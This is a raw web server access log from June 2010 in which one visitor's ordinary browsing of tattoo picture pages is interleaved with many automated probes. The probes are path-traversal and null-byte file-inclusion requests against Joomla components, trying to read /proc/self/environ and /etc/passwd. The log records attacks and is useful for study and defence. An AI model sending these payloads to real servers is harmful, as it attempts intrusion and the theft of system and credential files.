74.54.78.146 - - [09/Jun/2010:22:24:09 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:24:09 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:24:10 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:24:10 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
68.48.41.245 - - [09/Jun/2010:22:24:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:24:32 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:24:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:24:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
74.54.78.146 - - [09/Jun/2010:22:25:09 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:11 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:12 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:13 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:14 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:16 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:17 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:17 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:17 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
68.48.41.245 - - [09/Jun/2010:22:25:18 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.18) Gecko/2010021502 Ubuntu/8.04 (hardy) Firefox/3.0.15"
74.54.78.146 - - [09/Jun/2010:22:25:19 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:25:24 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:27:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:27:48 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:27:48 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:27:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:27:48 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.54.78.146 - - [09/Jun/2010:22:27:48 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.200.169.108 - - [09/Jun/2010:22:28:10 -0500] "GET /logs//index.php?option=com_jmsitemap&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [09/Jun/2010:22:28:10 -0500] "GET //index.php?option=com_jmsitemap&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [09/Jun/2010:22:28:11 -0500] "GET /logs//index.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [09/Jun/2010:22:28:11 -0500] "GET //index.php?option=com_jmsitemap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.14.126.247 - - [09/Jun/2010:22:28:48 -0500] "GET /logs/access_log.1273363200/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 383 "-""libwww-perl/5.834"
216.14.126.247 - - [09/Jun/2010:22:28:48 -0500] "GET /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.834"
216.14.126.247 - - [09/Jun/2010:22:28:48 -0500] "GET /logs/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 361 "-""libwww-perl/5.834"
207.57.250.92 - - [09/Jun/2010:22:29:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
204.232.202.236 - - [09/Jun/2010:22:29:27 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
204.232.202.236 - - [09/Jun/2010:22:29:27 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
204.232.202.236 - - [09/Jun/2010:22:29:32 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
211.203.180.144 - - [09/Jun/2010:22:29:45 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.203.180.144 - - [09/Jun/2010:22:29:45 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.203.180.144 - - [09/Jun/2010:22:29:46 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:30:43 -0500] "GET /logs/access_log.1212451200/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:30:44 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:30:45 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
74.55.65.134 - - [09/Jun/2010:22:30:57 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:22:30:57 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
118.129.166.213 - - [09/Jun/2010:22:31:44 -0500] "GET /logs/access_log.1212451200/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:31:45 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:31:46 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
195.64.165.104 - - [09/Jun/2010:22:33:07 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
118.129.166.213 - - [09/Jun/2010:22:33:18 -0500] "GET /logs/access_log.1238803200/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:33:26 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
207.57.250.92 - - [09/Jun/2010:22:33:34 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.109.245.22 - - [09/Jun/2010:22:34:31 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:34:32 -0500] "GET /logs/access_log.1238803200/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:34:32 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:22:34:33 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
211.203.180.144 - - [09/Jun/2010:22:34:45 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
